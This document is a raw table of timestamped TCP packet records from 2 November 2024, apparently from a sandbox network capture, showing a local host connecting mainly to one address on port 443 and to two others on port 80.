                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.341701984 CET4436377113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.342119932 CET63771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.342132092 CET4436377113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.473215103 CET4436377113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.473282099 CET4436377113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.473411083 CET63771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.473615885 CET63771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.473615885 CET63771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.473639965 CET4436377113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.473659992 CET4436377113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.476154089 CET63777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.476186037 CET4436377713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.476264954 CET63777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.476416111 CET63777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.476430893 CET4436377713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.583946943 CET4436377213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.584448099 CET63772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.584461927 CET4436377213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.584882975 CET63772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.584887981 CET4436377213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.727145910 CET4436377213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.727196932 CET4436377213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.727368116 CET63772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.727399111 CET63772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.727410078 CET4436377213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.727420092 CET63772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.727425098 CET4436377213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.729373932 CET63778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.729397058 CET4436377813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.729469061 CET63778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.729588032 CET63778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.729599953 CET4436377813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.735408068 CET8063773185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.735471964 CET6377380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.873495102 CET4436377413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.873838902 CET63774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.873852968 CET4436377413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.875216007 CET63774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.875221968 CET4436377413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.939985037 CET4436377513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.940310001 CET63775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.940346003 CET4436377513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.940685987 CET63775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.940700054 CET4436377513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.969043970 CET4436377613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.969314098 CET63776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.969327927 CET4436377613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.969677925 CET63776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.969681978 CET4436377613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.003221989 CET4436377413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.003390074 CET4436377413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.003437996 CET63774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.003472090 CET63774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.003480911 CET4436377413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.003489971 CET63774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.003494024 CET4436377413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.005776882 CET63779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.005803108 CET4436377913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.006105900 CET63779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.006258965 CET63779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.006272078 CET4436377913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.080054998 CET4436377513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.080102921 CET4436377513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.080182076 CET63775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.080308914 CET63775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.080310106 CET63775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.080339909 CET4436377513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.080367088 CET4436377513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.082134008 CET63780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.082149029 CET4436378013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.082227945 CET63780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.082331896 CET63780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.082339048 CET4436378013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.105050087 CET4436377613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.105333090 CET4436377613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.105411053 CET63776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.105537891 CET63776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.105549097 CET4436377613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.105557919 CET63776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.105561972 CET4436377613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.107381105 CET63781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.107405901 CET4436378113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.107467890 CET63781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.107600927 CET63781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.107613087 CET4436378113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.136241913 CET4972380192.168.2.4199.232.214.172
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.136286974 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.141872883 CET8049723199.232.214.172192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.141990900 CET8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.142056942 CET4972380192.168.2.4199.232.214.172
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.142075062 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.235673904 CET4436377713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.236124039 CET63777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.236149073 CET4436377713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.236547947 CET63777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.236552954 CET4436377713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.369276047 CET4436377713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.369405985 CET4436377713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.369581938 CET63777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.369698048 CET63777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.369716883 CET4436377713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.369729042 CET63777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.369734049 CET4436377713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.372272015 CET63782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.372286081 CET4436378213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.372350931 CET63782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.372502089 CET63782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.372512102 CET4436378213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.465965986 CET4436377813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.473881006 CET63778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.473901987 CET4436377813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.474342108 CET63778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.474347115 CET4436377813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.599983931 CET4436377813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.600028038 CET4436377813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.600080967 CET63778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.600239038 CET63778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.600239038 CET63778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.600250006 CET4436377813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.600258112 CET4436377813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.602675915 CET63783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.602706909 CET4436378313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.602827072 CET63783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.602942944 CET63783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.602955103 CET4436378313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.764339924 CET4436377913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.766463995 CET63779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.766480923 CET4436377913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.766865969 CET63779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.766870022 CET4436377913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.816586971 CET4436378013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.818403959 CET63780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.818420887 CET4436378013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.818753958 CET63780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.818758011 CET4436378013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.886001110 CET4436378113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.896024942 CET63781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.896042109 CET4436378113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.896415949 CET63781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.896421909 CET4436378113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.904561996 CET4436377913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.904625893 CET4436377913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.904694080 CET63779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.904870033 CET63779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.904889107 CET4436377913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.904900074 CET63779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.904905081 CET4436377913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.909245968 CET63784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.909303904 CET4436378413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.909399033 CET63784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.909497976 CET63784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.909527063 CET4436378413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.946439028 CET4436378013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.946568966 CET4436378013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.946712017 CET63780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.965110064 CET63780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.965116024 CET4436378013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.968202114 CET63785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.968233109 CET4436378513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.968374014 CET63785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.968558073 CET63785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:06.968571901 CET4436378513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.029716015 CET4436378113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.029875994 CET4436378113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.030144930 CET63781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.032567024 CET63781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.032583952 CET4436378113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.032593012 CET63781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.032598019 CET4436378113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.045996904 CET63786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.046039104 CET4436378613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.046123028 CET63786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.046272039 CET63786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.046298981 CET4436378613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.153784037 CET4436378213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.168068886 CET63782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.168087006 CET4436378213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.172775984 CET63782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.172780037 CET4436378213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.249109983 CET6377380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.249387980 CET6378780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.254250050 CET8063787185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.254879951 CET8063773185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.254956007 CET6377380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.254968882 CET6378780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.257410049 CET6378780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.262307882 CET8063787185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.320800066 CET4436378213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.320847988 CET4436378213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.320921898 CET63782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.336570024 CET63782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.336581945 CET4436378213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.336591959 CET63782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.336596012 CET4436378213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.340934038 CET63788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.340953112 CET4436378813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.341214895 CET63788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.341825962 CET63788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.341834068 CET4436378813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.347229004 CET4436378313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.350620985 CET63783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.350630999 CET4436378313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.351052046 CET63783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.351056099 CET4436378313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.478404999 CET4436378313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.478478909 CET4436378313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.478533983 CET63783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.478655100 CET63783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.478666067 CET4436378313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.478678942 CET63783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.478682995 CET4436378313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.480784893 CET63789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.480854034 CET4436378913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.480945110 CET63789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.481040001 CET63789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.481066942 CET4436378913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.676105022 CET4436378413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.676574945 CET63784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.676629066 CET4436378413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.677035093 CET63784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.677052975 CET4436378413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.749541998 CET4436378513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.749857903 CET63785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.749891996 CET4436378513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.750212908 CET63785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.750227928 CET4436378513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.807260036 CET4436378613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.807641983 CET63786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.807693005 CET4436378613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.808022976 CET63786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.808036089 CET4436378613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.811464071 CET4436378413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.811840057 CET4436378413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.811903954 CET63784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.811950922 CET63784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.811950922 CET63784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.811981916 CET4436378413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.812004089 CET4436378413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.814239979 CET63790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.814263105 CET4436379013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.814347029 CET63790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.814482927 CET63790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.814493895 CET4436379013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.888588905 CET4436378513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.888736010 CET4436378513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.888808966 CET63785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.888889074 CET63785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.888921976 CET4436378513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.888947964 CET63785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.888962030 CET4436378513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.891520023 CET63791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.891576052 CET4436379113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.891671896 CET63791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.891825914 CET63791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.891854048 CET4436379113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.941148996 CET4436378613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.941298962 CET4436378613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.941364050 CET63786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.941409111 CET63786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.941409111 CET63786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.941430092 CET4436378613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.941452026 CET4436378613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.943635941 CET63792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.943680048 CET4436379213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.943747044 CET63792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.943964005 CET63792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.943993092 CET4436379213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:08.082850933 CET4436378813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:08.083245039 CET63788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:08.083259106 CET4436378813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:08.083631992 CET63788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:08.083636045 CET4436378813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:08.209477901 CET8063787185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:08.209548950 CET6378780192.168.2.4185.215.113.43
